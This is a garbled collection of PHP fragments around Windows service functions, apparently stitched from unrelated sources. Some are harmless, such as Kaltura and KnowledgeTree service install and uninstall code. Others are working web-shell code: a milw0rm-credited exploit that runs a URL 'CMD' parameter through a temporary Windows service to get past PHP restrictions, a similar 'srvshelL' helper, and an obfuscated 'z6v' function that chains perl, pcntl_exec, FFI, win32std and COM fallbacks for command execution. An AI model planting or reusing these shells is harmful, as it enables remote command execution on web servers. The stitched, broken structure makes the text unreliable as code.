public function uninstall()
{
$this->action(function () {
cmd::echoL1('UnInstalling service: ' . Settings::$service . PHP_EOL);
return win32_delete_service(Settings::$service);
});
}
function srvshelL($command)
{
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while (!file_exists($name)) {
sleep(1);
}
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
} else {
KalturaLog::info('Service Status Unknown');
}
}
}
}
}
}
}
exit(0);
case 'install':
win32_create_service(array('service' => $serviceName, 'display' => 'Kaltura asynchronous batch jobs scheduler', 'description' => 'Kaltura asynchronous batch jobs scheduler', 'params' => __FILE__ . " run {$phpPath} {$iniDir}", 'path' => $phpPath, 'start_type' => WIN32_SERVICE_AUTO_START, 'error_control' => WIN32_SERVER_ERROR_NORMAL));
KalturaLog::info('Service Installed');
exit(0);
case 'uninstall':
win32_delete_service($serviceName);
KalturaLog::info('Service Removed');
exit(0);
case 'start':
win32_start_service($serviceName);
KalturaLog::info('Service Started');
exit(0);
case 'stop':
win32_stop_service($serviceName);
KalturaLog::info('Service Stopped');
exit(0);
case 'run':
win32_start_service_ctrl_dispatcher($serviceName);
win32_set_service_status(WIN32_SERVICE_RUNNING);
break;
case 'debug':
public function delete()
{
if ($this->status() !== WIN32_SERVICE_STOPPED) {
throw new \Exception("Service " . $this->serviceDisplayName . " is not stopped.");
}
if (win32_delete_service($this->serviceName)) {
error_log("Service " . $this->serviceDisplayName . " deleted");
return true;
}
throw new \Exception("Error deleting service: " . $this->serviceDisplayName);
}
### ###
### Note: Tested on 5.2.1 ###
### ###
### Author: NetJackal ###
### Email: nima_501[at]yahoo[dot]com ###
### Website: http://netjackal.by.ru ###
### ###
### ###
### Usage: http://victim.net/nj.php?CMD=[command] ###
#####################################################
$command = isset($_GET['CMD']) ? $_GET['CMD'] : 'dir';
#cammand
$dir = ini_get('upload_tmp_dir');
#Directory to store command's output
if (!extension_loaded('win32service')) {
die('win32service extension not found!');
}
$name = $dir . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
$exec = file_get_contents($name);
unlink($name);
echo "<pre>" . htmlspecialchars($exec) . "</pre>";
?>
# milw0rm.com [2007-07-27]
*
* This program is free software; you can redistribute it and/or modify it under
* the terms of the GNU General Public License version 3 as published by the
* Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
* details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* You can contact KnowledgeTree Inc., PO Box 7775 #87847, San Francisco,
* California 94120-7775, or email info@knowledgetree.com.
*
* The interactive user interfaces in modified source and object code versions
* of this program must display Appropriate Legal Notices, as required under
* Section 5 of the GNU General Public License version 3.
*
* In accordance with Section 7(b) of the GNU General Public License version 3,
* these Appropriate Legal Notices must retain the display of the "Powered by
* KnowledgeTree" logo and retain the original copyright notice. If the display of the
* logo is not reasonably feasible for technical reasons, the Appropriate Legal Notices
* must display the words "Powered by KnowledgeTree" and retain the original
* copyright notice.
* Contributor( s): ______________________________________
*
*/
win32_delete_service('ktscheduler');
function z6v($c)
{
global $win, $tempdir;
$r = '';
if (!empty($c)) {
if (!$win) {
if (extension_loaded('perl')) {
@ob_start();
$p = new perl();
$p->eval("system('{$c}')");
$r = @ob_get_contents();
@ob_end_clean();
} elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
$r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
$o = $tempdir . uniqid('pcntl');
$pid = @pcntl_fork();
if ($pid == -1) {
$r .= '[-] Could not fork. Exit';
} elseif ($pid) {
$r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
} else {
$c = array(" -e 'system(\"{$c} > {$o}\")'");
if (@pcntl_exec('/usr/bin/perl', $c)) {
exit(0);
}
if (@pcntl_exec('/usr/local/bin/perl', $c)) {
exit(0);
}
die;
}
$r = z9p($o);
@unlink($o);
}
} else {
$o = $tempdir . uniqid('NJ');
if (extension_loaded('ffi')) {
$a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} elseif (extension_loaded('win32service')) {
$s = uniqid('NJ');
@win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
@win32_start_service($s);
@win32_stop_service($s);
@win32_delete_service($s);
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} elseif (extension_loaded("win32std")) {
@win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} else {
$a = new COM("WScript.Shell");
$a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
$r = z9p($o);
}
@unlink($o);
}
}
return $r;
}
